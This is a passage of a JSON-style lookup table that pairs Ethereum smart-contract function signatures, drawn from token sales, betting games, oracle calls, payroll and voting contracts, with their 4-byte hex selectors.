"updateStatuses(bytes32[])": "0x8c82dccb", "init(address,address,address,string)": "0x24f91d83", "withdrawGalacticTokens(address)": "0xe5193c48", "getAllCellInfoFrom_To(uint256,uint256)": "0x00afd295", "addBlock(address,uint256,uint256,uint256,uint256)": "0xee41858e", "ETH10K()": "0xcd394a41", "SOC()": "0xa9595472", "disqualified(address,uint256)": "0x56939048", "Billionsgame()": "0x3198acad", "FideliumToken(uint256,string,string)": "0x787addc3", "TOKENERC20(uint256,string,string)": "0xd47bb75c", "ARBI()": "0x788a8c8b", "burnUndistributedTokens(uint256)": "0x64dc807a", "increaseProjectCompleteLevel()": "0x5751892f", "passTokensToTheTeam()": "0x79878757", "passFundsToTheTeam()": "0x7ddbf1a7", "transferTokensAndEtherValue(address,address,uint256,uint256)": "0x1f0da298", "passUndistributedEther()": "0xb2a072c6", "topUpWithEtherAndTokensForHolders(address,uint256)": "0xf6f10a26", "placeBet(uint8)": "0x43046844", "pitFee()": "0xabf74a93", "pay_winner(uint256)": "0xb821f815", "payRequstedSum(uint256,uint256)": "0xb2310cc5", "PayOut(uint256)": "0x081e806d", "payoutReady()": "0xe0fe075e", "PayoutQueueSize()": "0x85db2dda", "PayMiners()": "0xff08d2b0", "payImporterBankForGoodsBought()": "0x4d268ddd", "payEther(uint256)": "0x18b749c4", "pay()": "0x1b9265b8", "Participate(uint256)": "0xf65c4d42", "ParallelGambling()": "0x88c3ba85", "owns(address)": "0xf7bc39bf", "owner_withdraw(uint256)": "0xb33926cb", "ownerUpdateCostToCallOraclize(uint256)": "0x26da8e17", "owner_transfer_ownership(address)": "0x150ad2a8", "ownerTransferEther(address,uint256)": "0x7ac37d58", "ownerTakeProfit(bool)": "0x758971e8", "ownerTakeProfit()": "0xf738e5ca", "ownerSetTreasury(address)": "0x31375242", "owner_set_time_limit(uint256)": "0x8b64d70e", "ownerSetOraclizeSafeGas(uint32)": "0xd207e757", "ownerSetMinBet(uint256)": "0x6cdf4c90", "ownerSetMaxProfitAsPercentOfHouse(uint256)": "0x5e968a49", "ownerSetHouseEdge(uint256)": "0x268d50fe", "owner_set_fraction(uint256)": "0x392327b5", "owner_reveal_and_commit(uint8,bytes32,bytes32)": "0xa27c672a", "ownerRefundPlayer(bytes32,address,uint256,uint256)": "0xcf832ce2", "ownerPausePayouts(bool)": "0x4b7fcee7", "ownerPauseGame(bool)": "0x6eacd48a", "ownerkill()": "0xd263b7eb", "OwnerDeposit()": "0xd6e0bf29", "owner_deposit()": "0xad04592e", "ownerChangeOwner(address)": "0x4f44728d", "OwnerAnnounce(string)": "0xe2894a8a", "overthrow(string)": "0x16bac350", "ord()": "0x17961d0f", "orderMatch(uint256,uint256,int256,uint256,uint256,address,uint8,bytes32,bytes32,int256)": "0xbd858288", "orderMatch(uint256,uint256,uint256,int256,uint256,uint256,address,uint8,bytes32,bytes32,int256)": "0x6b1cb549", "oraclize_setCustomGasPrice(uint256)": "0x01095962", "oraclize_setConfig(bytes32)": "0x83a51ad0", "oraclize_query(uint256,string,string[],uint256)": "0xa2b5591c", "oraclize_query(uint256,string,string[])": "0xdc206e5f", "oraclize_query(uint256,string,string[5],uint256)": "0x00a94b6e", "oraclize_query(uint256,string,string[5])": "0x6510ef4d", "oraclize_query(uint256,string,string[4],uint256)": "0x0494630f", "oraclize_query(uint256,string,string[4])": "0x2ff92323", "oraclize_query(uint256,string,string[3],uint256)": "0xfb114f57", "oraclize_query(uint256,string,string[3])": "0xec6afc22", "oraclize_query(uint256,string,string[2],uint256)": "0x29a6f31b", "oraclize_query(uint256,string,string[2])": "0xa8c3ec48", "oraclize_query(uint256,string,string[1],uint256)": "0x77ac3da5", "oraclize_query(uint256,string,string[1])": "0x0ff4f160", "oraclize_query(string,string[],uint256)": "0xe50a3bb1", "oraclize_query(string,string[])": "0x14167bf0", "oraclize_query(string,string[5],uint256)": "0xb6ce5581", "oraclize_query(string,string[5])": "0xbd9a5673", "oraclize_query(string,string[4],uint256)": "0xbc5ff5e1", "oraclize_query(string,string[4])": "0x16d9356f", "oraclize_query(string,string[3],uint256)": "0xae404996", "oraclize_query(string,string[3])": "0x9b9ba572", "oraclize_query(string,string[2],uint256)": "0xa6bf3df0", "oraclize_query(string,string[2])": "0x044d0b06", "oraclize_query(string,string[1],uint256)": "0x871113c3", "oraclize_query(string,string[1])": "0xc8e55708", "oraclize_getPrice(string,uint256)": "0xabe9f569", "oraclize_getPrice(string)": "0x053c351b", "oracalizeReading(uint256,string)": "0x9a828a71", "oracalizeReading(uint256)": "0x9549355e", "operated()": "0xa5eb7a4e", "onEtherandomSeed(bytes32,bytes32)": "0x041fe13d", "onEtherandomExec(bytes32,bytes32,uint256)": "0xe671f510", "one()": "0x901717d1", "offer(uint256,uint256)": "0xa1920586", "Oath()": "0x902e64e5", "numDebtors(address)": "0xca35271c", "numBets()": "0xdf06f906", "numberOfPlayersInCurrentRound()": "0xdf811d7d", "NumberOfMiners()": "0x85233869", "NumberOfCurrentBlockMiners()": "0x892c0214", "NumberOfBlockAlreadyMined()": "0xdea06188", "notify(uint8,string,string)": "0xfa4e5e5a", "Notifier(string)": "0x58d3b617", "NotAnotherPonzi()": "0xecb4136e", "NormalizeRanks()": "0x305075db", "NormalizeMoney()": "0xac20902e", "NoFeePonzi()": "0x0908178f", "NiceGuyPonzi()": "0xa668d7c9", "nextWithdrawal(bytes16)": "0xb3a2a999", "nextUnderdogPayout()": "0xb3cb8885", "nextRune()": "0xd1bf9aba", "nextRound()": "0x47e40553", "nextPayoutGoal()": "0x332f93a9", "next_draw(bytes32,uint256,uint256,uint256,uint256,uint256)": "0x727b1cd6", "next(address)": "0xab73e316", "Nexium()": "0xf28386bf", "newvow(uint256,address)": "0x97bb2a63", "newSale(bytes16,uint256,uint256)": "0x025bbbe5", "newRequest(uint256)": "0xa07daa65", "register(uint256,uint256,bytes32,string,bytes32)": "0x7db45975", "castVote(uint256,uint256,bytes32,string,bytes32)": "0x42d46a9a", "createClaim(address[],uint256,address)": "0x59a3e577", "QatarCoin()": "0xad5dabca", "HelpCoin()": "0xb706b764", "_phxToken(address)": "0xe55ed42e", "_prand(uint256)": "0x6baae8e5", "PHXFlip()": "0x18d62bc6", "VNT()": "0x9cb157d9", "MRIDUL()": "0x96bf5022", "issueAndActivateTokenBounty(address,uint256,string,uint256,address,bool,address,uint256,address)": "0x03291893", "SAPOVAM(address,string,string,uint256,uint256)": "0xa4963c0b", "setAvailableToken(uint256)": "0xd8f306a1", "setTokenReward(address,address,uint256)": "0x04571211", "setTokensPerEth(uint256)": "0x56238b02", "withdrawAvailableToken(address,address,uint256)": "0x8d2ea8dc", "BuyBSTtokens()": "0xbd431462", "SetupPreSale(bool)": "0x7f7b17a0", "initialBSTSupply()": "0x534d5acb", "BetstreakICO()": "0x82484c0b", "setNewAgent(address)": "0x40976b60", "setDivBonus(uint256)": "0xb48b73aa", "setMulBonus(uint256)": "0xb492bd32", "distributeAirdropMultiPresale(address[],uint256[],uint256[])": "0x53cae7b8", "distributeAirdropMulti(address[],uint256[])": "0xfed0b877", "WiredToken()": "0x3aba9e9b", "cleanTokensAmount(address,uint256)": "0x240557b8", "_checkLockUp(address)": "0x322671cd", "Ethereumcapital()": "0xf71868da", "sendTokensManager(address,uint256)": "0x8ed7c3d3", "delManager()": "0x6045804f", "MRDSTSCoinToken()": "0x1e063d98", "OKMcoin(uint256,string,uint8,string)": "0x4da51208", "AllbesticoContract()": "0x1786351b", "FlexibleToken(string,string,uint8,uint256)": "0x55b71344", "CTChinaCoin()": "0x58d6a99e", "VanMinhCoin(uint256,string,uint8,string)": "0xc92db04d", "newProposal(bytes32,address,uint256,bytes)": "0x695addc9", "USBcoin()": "0x624d4309", "nCryptToken()": "0x1d02fb06", "setPreSaleOff()": "0x42beb58b", "setPreSaleOn()": "0x9652389c", "setBonusOff()": "0xf22b0c94", "setDayThird()": "0xd47cf598", "setDaySecond()": "0x9032bfc8", "setDayFirst()": "0x6cba45b8", "sendSupplyTokens(address,uint256)": "0x66bea821", "sendBounty(address,uint256)": "0x404704b9", "proceedPreIcoTransactions(address[],uint256[])": "0x3ebfde04", "sendEvents(address,uint256,uint256)": "0x00ed2592", "QVT(address)": "0x0930f27b", "setAddressOfERC20Tocken(address,address)": "0x64794403", "AGASCrowdsale()": "0x5d3c7c9b", "SeeleGold()": "0xa382edfd", "StandardToken(string,string,uint8,uint256)": "0x6d8d16b9", "MyEtherTellerEntityDB()": "0x7390a673", "transferFund()": "0x302eb389", "PreSale3DAPP(address)": "0xdab43e6d", "SOYA()": "0x33862914", "reOrganizeAuthorities()": "0x017e6f5f", "checkAndUpdateLimit(uint256)": "0xc55f60dc", "create0(uint256,bytes)": "0x2e9f86cd", "execute0(address,uint256,bytes)": "0x6b5ae41c", "propose(address,uint256,bytes)": "0x93ba3f15", "setRequirement(uint256)": "0x8f56015f", "changeAuthority(address,address)": "0x97db9a95", "hasConfirmed(bytes32,address,address)": "0x4a3310b8", "isAuthority(address)": "0x2330f247", "getAuthorityIndex(address)": "0xf257bf3b", "getAuthority(uint256)": "0xffae2c5b", "bitfwdToken()": "0x4147ffe5", "TeCToken()": "0x8d09b9cc", "Luckblocks()": "0x19e1d8d4", "THreeDBToken()": "0xadf60404", "closePresale()": "0x63cea450", "ABCPresale(uint256,uint256,address,address)": "0x35956c42", "newPaymentAddress(address,bytes4)": "0x889d227d", "PaymentAddressFactory()": "0x2564e1c4", "PaymentAddress(address,bytes4)": "0xef551b38", "Factory(string)": "0x9d96f200", "Version(string)": "0x2d8e3250", "CMTC()": "0x6cdc644d", "MXToken()": "0x92f8de45", "eSTATERToken(address,address)": "0xbb85931b", "unsoldTokens()": "0xb670a4b1", "BCToken(uint256,string,string)": "0x81bc8742", "switchState()": "0x8b6084e4", "processTransaction(bytes,uint256,address,bytes20)": "0xbc8e1143", "tokenAssignExchange(address,uint256,uint256)": "0x93eade00", "calNewTokens(uint256,string)": "0x90300e38", "totalDiscount(uint256,uint256,string)": "0xbf0872ef", "volumeDiscounts(uint256,string)": "0x1f502a13", "baseDiscounts(uint256,uint256,string)": "0xe6b6f9d5", "parseOutputScript(bytes,uint256,uint256)": "0x0d63fdbe", "isP2SH(bytes,uint256,uint256)": "0xd5c469f8", "isP2PKH(bytes,uint256,uint256)": "0x8c115322", "sliceBytes20(bytes,uint256)": "0xcba66e14", "scanOutputs(bytes,uint256,uint256)": "0x97a42022", "scanInputs(bytes,uint256,uint256)": "0xe0a802ba", "checkValueSent(bytes,bytes20,uint256)": "0xe57ea16d", "token_call()": "0x543a3d62", "MIN_CAP()": "0x801db9cc", "getActionHistorySize()": "0x553594e4", "MAXfinney()": "0x9a323ac4", "createEmergencyFundReleaseProposal()": "0xb0a5a57a", "trFee()": "0x5012eb67", "ethToTokenConversion()": "0xc9330bfb", "firstDiscountCap()": "0x4b1dd591", "kimsOnAuction()": "0xab630fc4", "advisorAllocation()": "0x11823e04", "preICOend()": "0xf705fb87", "reservedIcoCrowdsale()": "0x141ca2c7", "companyClaimed()": "0x253bc579", "icoBonus4()": "0x87a3e445", "SUPPLY_CAP()": "0x0cfccc83", "INTREPID_SHIP_PRICE()": "0x23c860a8", "catalogPlayersAddress()": "0x07f07648", "pre_active_time()": "0x15cab9c0", "ico4Cap()": "0x2ebbac6c", "secondPeriodWindows()": "0x39a3f168", "val()": "0x3c6bb436", "DEFAULT_NAME()": "0x98c69648", "dividendCutPercentage()": "0xc7ac14b1", "create21KittiesTokens()": "0x485dc6cf", "supplyNum()": "0x85d61e2a", "tokensAvailableForSale()": "0xbdeb9fb4", "valueRaised()": "0xdb7757cf", "totalUsdFunding()": "0x26c435a9", "TimeLockr()": "0xa2d97fa7", "kittyGym()": "0xf26377ed", "pacifistmasterReq()": "0x42d64601", "deathData_v14()": "0x1e9eb554", "getSoftCapReached()": "0x06e4d36f", "_activate()": "0xfcb300e6", "widthrawDev()": "0xd8a1e70a", "order_number()": "0x8087da3a", "contributorsIndex()": "0x707424fe", "colonyMultiSig()": "0x08ec6164", "LIMIT_PER_USER()": "0xeeaee3e4", "FEE_ADMIN()": "0xd70afa96", "totalUsdValueOfAllTokens()": "0xc157b869", "BCEToken()": "0x43b12e95", "instantTransfer()": "0x6b7eba7d", "migrationEnded()": "0x7d0b4d60", "gasPriceLimit_()": "0xae87fd06", "publicSaleStart()": "0x3360caa0", "bbAirdropWallet()": "0x5e5e305e", "isCrowdsaleClosed()": "0x8807a110", "priceStep4()": "0x6adacb48", "ethTeamWallet()": "0xad207feb", "getCEOAddress()": "0xdc2af3de", "endSplitAgreement()": "0x61496b83", "Contract_Owner()": "0xf09ecf10", "maxFinalStage()": "0x89b5b514", "startCrowdfund()": "0x9a593b9a", "totalLicensePurchases()": "0xcf134a06", "exchangesOwner()": "0x3f966082", "BONUS_ICO_ROUND1()": "0x7024ce7b", "pgoMonthlyInternalVault()": "0xf1311a2e", "startPREICO()": "0x12c99005", "max_crowd_vitas()": "0x98234a6c", "secondReserveWallet()": "0x6880ff5b", "paymentEnabled()": "0x6b3578f2", "whitelistedAddressCount()": "0x6bce8a96", "Marketing()": "0xdb886f23", "EnddatePresale()": "0xc203367a", "TIER_1_CAP()": "0x830ced52", "isAllowToIssue()": "0x5551d1b7", "USEAddr()": "0x055a7341", "firstStageDatetime()": "0xcd91672d", "ctWallet()": "0xa564871f", "maxPresaleContributionEther()": "0xb3e53d8a", "m_SMR()": "0xdcbc1288", "GetFreeTokens()": "0x76d2d717", "paladinEquity()": "0x65921f02", "vestingTokens()": "0x5e07c354", "endFunding()": "0x1c8eac0f", "invitedByReferalBonus()": "0xd7237e45", "minterContract()": "0x92f00233", "xpaExchange()": "0x26571388", "phase1MaxEtherCap()": "0xbd7c13c6", "tokensPerCHF()": "0xc2baa882", "isICOFinished()": "0xe031d6f0", "getCredit()": "0x59296e7b", "nextFeesPerMillion()": "0xf5a1c96d", "m_attaching_enabled()": "0x74dacc7a", "getEventStart()": "0x37383c2d", "isWorking()": "0x099aea0a", "PaymentFinished()": "0x56aa7cef", "reputation()": "0xc52164c6", "bancorErc20Eth()": "0xec92b98d", "isMinted()": "0x36ae5040", "vestingStartTimestamp()": "0xd6ddd21b", "operatorAddress()": "0x127effb2", "playForcibly()": "0x0a18f6c1", "ContractName()": "0xfd79c2a9", "totalLockedAmount()": "0x05a9f274", "totalDividendPayments()": "0x127eca3f", "total_amount()": "0x673cd98e", "stoptransfer()": "0x312212c1", "indexExists(bytes32)": "0x4f2989af", "TreeContract()": "0xe958d1ae", "testInitialBalanceWithNewMetaCoin()": "0x2e6aa830", "testInitialBalanceUsingDeployedContract()": "0x37f3cb24", "setExchangeRate(address,uint256)": "0xbd5c5420", "updateExchangeRates()": "0x77caa61a", "payday()": "0x6881385b", "determineAllocation(address[],uint256[])": "0xfe2fdf0b", "emergencyWithdraw()": "0xdb2e21bc", "escapeHatch()": "0x1554611f", "removeEmployee(uint256)": "0x21ed0f64", "setEmployeeSalary(uint256,uint256)": "0x0a0c75aa", "addEmployee(address,address[],uint256)": "0x68c84260", "setServices(address,address)": "0x2438db59", "calculatePayrollRunwayInMonths()": "0x1160b93b", "calculatePayrollRunway()": "0x6432e9e0", "calculatePayrollBurnrate()": "0x2560baeb", "getEmployee(uint256)": "0xbca9a5c5", "getEmployeeId(address)": "0x65aade1a", "getEmployeeCount()": "0xc2a63e3b", "Payroll(address,address)": "0xe4b7b1b0", "KPCSAdministrator(string)": "0xb8a3c6ea", "call(bytes)": "0x5a6535fc", "getVersion()": "0x0d8e6e2c", "setPersonal(address)": "0x1d8b13a6", "toggleKillSwitch()": "0x4630f1d5", "setCreator()": "0x59f121a8", "VersionControl()": "0x6dc1f360", "calculateWinner()": "0xea35e805", "validCandidate(bytes32)": "0x392e6678", "vote(bytes32)": "0xa69beaba", "totalVotesFor(bytes32)": "0x2f265cf7", "addVoter(address)": "0xf4ab9adf", "getPhase()": "0xeced0280", "finishVoting()": "0xf9094303", "startVoting()": "0x1ec6b60a", "getCandidateList()": "0xfdbc4006", "addCandidate(bytes32)": "0x230d6ed8", "Ballot()": "0xb655f822", "currentOwner()": "0xb387ef92", "contractFallback(address,address,uint256,bytes)": "0x937b7cf1", "rc5()": "0x5dc3d02d", "decrypt(uint256[])": "0x3960f787", "encrypt(uint256[])": "0xe06e3873", "expand(uint256[])": "0x08901fce", "rotate_right(uint256,uint256)": "0xceee9658", "rotate_left(uint256,uint256)": "0xe9f58a52", "shift_right(uint256,uint256)": "0xcea5d64b", "shift_left(uint256,uint256)": "0xaf6ddad8", "awardPot(string,uint256)": "0x47d3856a", "addAction(string,uint256)": "0xd8b50a63", "sit(uint8)": "0x92c54f92", "buyIn(uint8,uint256)": "0xbd76540a", "TexasHoldem(string,uint8,uint8)": "0x9892003a", "sumExpOffset(int256,int256[],uint256,uint8)": "0x12386471", "calcCostLevel(int256,int256[],uint256)": "0x3123016d", "finishMinting()": "0x7d64bcb4", "getAnswer()": "0x9c16667c", "addressOf(address,bytes32)": "0xe99718d8", "resolveDisputeBuyer(string)": "0x7d9a9046", "resolveDisputeSeller(string)": "0xb380d365", "assignDispute(string,address,string,address)": "0x89158ff9", "assignDispute(string,address,string)": "0xab1d3add", "setOraclizeGasLimit(uint256)": "0x8ddf792b", "setOraclizeGasPrice(uint256)": "0x71c82c14", "DisputeResolver(address[],address)": "0xded1e4de", "closeMarket()": "0xc511ed5e", "createMarket()": "0xaea0e35f", "createAMIS(address)": "0x47bda66d", "AMIS(address)": "0x1f9c5580", "setContactInformation(string)": "0xb967a52e", "contracts(bytes32)": "0xec56a373", "decayedTransferFrom(address,address,uint256,address)": "0x302a4100", "decayedTransfer(address,uint256,address)": "0xf2642d0f", "decayedBalanceOf(address,address)": "0xacc88c0d", "decayedBalanceOf(address)": "0x9ef13593", "removeBoundary(uint256)": "0xf2adc939", "addBoundary(address)": "0xe38fbdf6", "acceptMediation(uint256)": "0x3e60c83a", "getNominatedMediator()": "0x26bdd20b", "setElectedMediator()": "0x2c6105f9", "randomGen(uint256)": "0x434b14e7", "getAgreedMediators()": "0x4869687b", "getAllClients()": "0xe4d7a3d4", "getAllMediators()": "0x071fac61", "removeClient(address)": "0x9089f616", "addClient(address)": "0x43928cfd", "addMediator(address)": "0xfeb2432a", "Mediation(address)": "0xa9e7cb10", "reclaimContract(address)": "0x2aed7f3f", "setnumber(uint256)": "0xa632a2e5", "fetch()": "0xa95c372d", "decrement()": "0x2baeceb7", "storenumber()": "0x49cf211e", "settleContract(uint256)": "0x2577929b", "checkSettlement()": "0xa8bb76d4", "getQtyFilledOrCancelledFromOrder(bytes32)": "0x4c258eb1", "requestEarlySettlement()": "0x6db7f77c", "reclaimUnusedEtherBalance()": "0x7e456808", "setCollateralPoolContractAddress(address)": "0xc201293b", "withdrawEverything()": "0xd1e191a4", "TOKEN_WITHDRAWAL_END_DATE()": "0x5c003af9", "limitSupply()": "0x2ddcb21f", "METADATA_URL()": "0xe1911d70", "truToken()": "0x03dcf6bc", "vpe_per_Keos()": "0x6799c0e0", "startPrivateSaleStage()": "0xec24aa01", "Remove()": "0x6424bd8c", "rebateOneFenmu_()": "0xe219b9e1", "ppFinishTime()": "0x1f04becc", "delayOfICO2()": "0x0e2a05c8", "lastBlock_f15Hash_uint256()": "0x792ad365", "referralPool()": "0x1e4df938", "PRE_SALE_START()": "0x7e1f89c8", "EGGS_TO_HATCH_1SHRIMP()": "0x732e77d0", "BONUS_MID()": "0x2f540d94", "totalBalancingTokens()": "0x59769073", "releaseRecordsCount()": "0x569fa9f9", "SQR_TOKEN_DECIMALS()": "0x558599ea", "identities()": "0xde9f4248", "EGGS_TO_HATCH_1FALCON()": "0xe5de0b89", "controller1()": "0x52a8aeab", "stor()": "0xb28175c4", "send_allowed()": "0x4adaedef", "deploymentCost()": "0xac133d3b", "numberOfPunksToReserve()": "0xa4ddf312", "presaleWei()": "0x59a536b0", "_name()": "0xd28d8852", "sntController()": "0x1b2f1109", "removeLastRace()": "0x7bbd3f19", "limitTier2()": "0x338f4dd9", "CONTRIBUTIONS_MAX()": "0x93fea184", "totalMonster()": "0x7a09defe", "addressReserveSupply()": "0xbb9932a7", "king()": "0xcc181ca8", "soldIdeaWei()": "0xc6de150b", "USDEtherPrice()": "0x0563bbf6", "saleCapUsd()": "0xcb944e24", "c_startTime()": "0xaf3f0ebe", "secondHighestBid()": "0xacb902f6", "investmentPositions()": "0xa533daf7", "stopPostIcoAndBurn()": "0x26d2eb11", "FeeAddr1()": "0x818a19b5", "getEventsCount()": "0x30366d5f", "xcertKyc()": "0xb2205a38", "mintingAllowed()": "0x96532d1c", "allowedOracleChangePercent()": "0x65d43868", "PRE_ICO_MIN_DEPOSIT()": "0xe59eee2e", "UNLOCKSTART()": "0x67cd3f64", "freezeBlock()": "0x3a157860", "advisorsTokenWallet()": "0xe6ff0853", "ThirdPartyPlatformAddr()": "0xbf1b31c2", "knuckReward()": "0xd68fac6d", "timeOfWin()": "0xa1b94c0b", "_MineId()": "0x1e51cb10", "ICO_PERCENTAGE_3()": "0x217477f6", "numAuthorities()": "0x3295feb3", "nodePrice()": "0xf1fec2b8", "CALLER_EXCHANGE_SHARE()": "0x85f07a2b", "performPayouts()": "0xf0ba96ff", "battleDecider()": "0x8660cbf5", "privateCreation()": "0xf8c80d26", "REQUEST_URL()": "0x7ea9b2bc", "crowdsaleMinUSD()": "0x74056b73", "SECOND_SUPPLY()": "0x4815d4a9", "walletContract()": "0xd0ed5c2f", "tokpereth()": "0x75da33bd", "endRC()": "0xfe87ee28", "ethWeiRaised()": "0x4bca4626", "ADVISOR_POOL_INIT()": "0x29b49825", "OFFSET()": "0xce665dd8", "lastStakePriceUSCents()": "0xe46694e8", "lockdown()": "0x3e8a0bc9", "priceStart()": "0x173067a3", "liquidPledging()": "0x74041d1f", "teamUnlock1()": "0xd0a27473", "debugVal2()": "0x590fcc5b", "prePreIcoStartAt()": "0x5cb7226d", "DeathFactor_iv()": "0xe16f5fe9", "contracteventcount()": "0xec56c6b0", "createPerDay()": "0xf96512cc", "slippage()": "0x3e032a3b", "ICO_TRIGGER()": "0xcf2d5eb4", "GAME_START_TIME()": "0xebb85502", "c_MinFunds()": "0x7c92a217", "tokensPerTrunche()": "0x082fa708", "finishedAt()": "0x47d54bff", "rateOfZNT()": "0x3bdd504a", "teamTokenRatio()": "0xd1746107", "round0EndTime()": "0x83d4f946", "CALLER_EXCHANGE_RATE()": "0x0fc10026", "DISTRIBUTION_COMMUNITY()": "0x74e00730", "frozenPauseTime()": "0x3aa90889", "sumICO()": "0xb9bda244", "lastFactChangeValue()": "0x5d8214db", "crowdsaleCount()": "0x02404bee", "verificationSlashingPeriod()": "0x9f37b53f", "latestFriend()": "0x4e6e6928", "trustedVault()": "0x279fdf6d", "PATCH_VERSION()": "0x6bf2606a", "activateConflictResolution()": "0x9f34ce14", "setProfitTransferTimeSpan(uint256)": "0x9c0051db", "MAX_TRANSFER_TIMSPAN()": "0x947bc72d", "setStakeRequirements(uint256,uint256)": "0x9449a361", "houseProfit()": "0x88fedd04", "gameIdGame(uint256)": "0x83e256dc", "withdrawHouseStake(uint256)": "0x81efc01d", "cancelGame(uint256)": "0x69958ab9", "playerForceGameEnd(uint256)": "0x665eba29", "conflictRes()": "0x5ba2dd22", "timePaused()": "0x563c23a0", "MIN_TIMEOUT()": "0x543ad1df", "addHouseStake()": "0x4f739ff0", "typeHash()": "0x49926028", "createGame(bytes32)": "0x457391e5", "lastProfitTransferTimestamp()": "0x41b80184", "minStake()": "0x375b3c0a", "profitTransferTimeSpan()": "0x2c94a235", "playerGameId(address)": "0x25b05c88", "MIN_TRANSFER_TIMESPAN()": "0x19fc36ed", "playerEndGameConflict(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address,bytes,bytes32)": "0x0b305c62", "give(bytes32,address)": "0xbaa8529c", "draw(bytes32,uint256)": "0x440f19ba", "lock(bytes32,uint256)": "0xb3b77a51", "revert(string)": "0x6d5860d4", "setWhitelist(address)": "0x854cff2f", "setWhitelistA(address,address)": "0xe1ebdb6d", "setWhitelist(address,address)": "0xba181ac6", "setWhitelist()": "0xb923b205", "removeOperator(address,address)": "0x40b61fe9", "addOperator(address,address)": "0x8a1af4c4", "unSet(address,address)": "0x0a0078bc", "set(address,address)": "0x89675cac", "emitExecuted(address,uint256,uint256,uint256)": "0xb684101d", "emitCancelled(address,uint256,uint256)": "0xef6d7b3b", "emitAborted()": "0xf6860955", "emitCancelled()": "0xa1bffefa", "emitExecuted()": "0x7a1c0063", "constructor_()": "0x5017f1f1", "tgeSetFinished()": "0xa9791aec", "getEXECUTION_GAS_OVERHEAD()": "0x708f8940", "validate(address[4],address,uint256[12],uint256,uint256)": "0xf9d13bf0", "validateRequestParams(address[3],address,uint256[12],uint256,uint256)": "0xa0d46c87", "checkFlag(bytes)": "0xb4eff690", "WithdrawSpecialEth(address,uint256)": "0x4ce51b92", "WithdrawSpecialEth(uint256)": "0x9c81806d", "WithdrawAllReserves()": "0x2929dc09", "WithdrawReserve(address)": "0x588c2a6d", "RecurringPayment(address,uint256,uint256,address)": "0x844dbf67", "changeZipper(address)": "0x38969d64", "createMultisig()": "0x4ebe2d46", "ZipperMultisigFactory(address)": "0x4d4439fa", "changeRealZipper(address)": "0x483e7872", "ZipperWithdrawalRight(address)": "0x054fce82", "calcTokenToWei(uint256)": "0x98d2e3b1", "restoreContract()": "0x91147dfa", "transferBounty(address,uint256)": "0x2f7442bb", "setDApp(address)": "0x6bcab76c", "setBountyManager(address)": "0xff66a305", "buyback()": "0xf8ec6911", "setBuyBackPrice(uint256)": "0x8b008f0f", "getDividendInfo()": "0x139e23b5", "claimDividend()": "0xf0fc6bca", "confirmDividend(uint256)": "0x0a9ffbf9", "declareDividend(uint256)": "0x85fa33eb", "isAddressActivated(address)": "0x1327290d", "activateAddress(address,bool)": "0x1a9938aa", "getInvestedAmount(address)": "0x1ef987c1", "_finishICO()": "0x2884c115", "_invest(address,uint256)": "0x47c0ea6b", "investWithBitcoin(address,uint256)": "0xa7f9df38", "AMBTICO()": "0x9602bb20", "fixDividendBalances(address,bool)": "0x6ef3732d", "WithdrawAll()": "0x5a648bc5", "WithdrawToken(address)": "0x5c4c9f6f", "ChangeComission(uint256)": "0x9aaa38a6", "GetReserveAmount(address)": "0xed26e60d", "StoreComission(address,uint256)": "0xcfd2eb49", "PayToken(address,address,uint256)": "0x65cd1bea", "PayEth(address,uint256)": "0x04f08eec", "RetireHodl(uint256)": "0x5b0e70ff", "ClaimHodlToken(address,uint256,uint256)": "0x3e0fddbd", "HodlEth(uint256)": "0x8678c2b9", "Getsafe(uint256)": "0xa871ffdc", "GetUserSafesLength(address)": "0xd9d61a10", "constructor()": "0x90fa17bb", "submitJRH(uint256,uint256,bytes32,uint256,bytes32[],uint256,bytes32[])": "0xe62444e1", "respondToChallenge(uint256[9],bytes,bytes32[],bytes,bytes32[],bytes,bytes32[],bytes,bytes,bytes32[])": "0xc28ec9d7", "binarySearchForChallenge(uint256,uint256,bytes,uint256,bytes32[])": "0xba9e9a86", "invalidateHash(uint256,uint256)": "0xb4f15310", "confirmNewHash(uint256)": "0x1bafc373", "submitNewHash(bytes32,uint256,uint256)": "0x35527354", "getEntryHash(address,uint256,bytes32)": "0x27783050", "submittedHashes(bytes32,uint256,uint256)": "0xfaa458f4", "verifyProof(bytes32,bytes,bytes,uint256,bytes32[])": "0xf7e498f6", "getRootEdge()": "0xa43914da", "disputeRounds(uint256,uint256)": "0x9deca9ee", "nSubmittedHashes()": "0x95c97432", "getRootHash()": "0x80759f1f", "getImpliedRoot(bytes,bytes,uint256,bytes32[])": "0x7f8b9478", "currentNumberOfUpgrades()": "0xf10a9848", "sharedExpenseWithdrawn()": "0x6e2fd470", "BOOKIE_POOL_COMMISSION()": "0xe0eef0b9", "releaseRedTeamTokens()": "0x8c0bae5b", "COO_SHARE()": "0x8c96a538", "advisors_address()": "0x8b64b3af", "stakingToken()": "0x72f702f3", "dividendRecentBuyersPercentageDecreaseFactor()": "0xe78562c0", "totalTreePower()": "0x7fdafafa", "MINIMUM_PURCHASE_IN_USD()": "0x2782ca8d", "fourthExchangeRate()": "0xa382aee2", "latestAddress()": "0x0d0567ae", "MIN_BUYIN_VALUE()": "0x294fa425", "getMinBid()": "0x8cb39385", "hardWeiCap()": "0x6b453fac", "SPECIALIST_STAKE_TWO()": "0x970db3df", "CurrentGoldPrice()": "0x6f253319", "bountyFee()": "0xa101f7cd", "masterTransfersEnabled()": "0xb127326e", "tokensClaimed()": "0xb44df72d", "totalSupplyFromInventory()": "0xeb229f1e", "feeAccountToken()": "0xf2787d33", "etherReceivedPrivate()": "0xe00cb0bc", "manualPrice()": "0xa2c9d630", "hardCapWei()": "0xe923e707", "janPot_()": "0x928771bb", "distributeReservedTokens()": "0xca1aa5bb", "getVotingStart()": "0x4b11e7a0", "oraclizeQueryCost()": "0x3ba86465", "EcosystemFund()": "0x43f97628", "tokensSentMain()": "0xed810d02", "Owner1()": "0xf1d2b3c2", "minBounty()": "0x89b8db55", "threeHotHoursCapInWei()": "0x76dc6643", "noOfICOPhases()": "0xa4ffd7fa", "wlcontract()": "0x021979c3", "minerCreatedCount()": "0x709eaa93", "m_hardCap()": "0xafb6b9a5", "VOTING_TIMESPAN()": "0x62d55b6d", "MARKETING_POOL_TOKENS()": "0x4011baf9", "transactionFeeMax()": "0x7207f9ce", "crowdsaleIsOpen()": "0x83349122", "vigencia()": "0x762d739a", "tokenSaleLeft()": "0xc9d256ae", "smallestUnitName()": "0xc36de531", "SimpleTGEContract()": "0x7aaeb37c", "maxCapTokenPresale()": "0xbc12d19d", "FUTURE_DEVELOPMENT_FUND()": "0x2a60cf07", 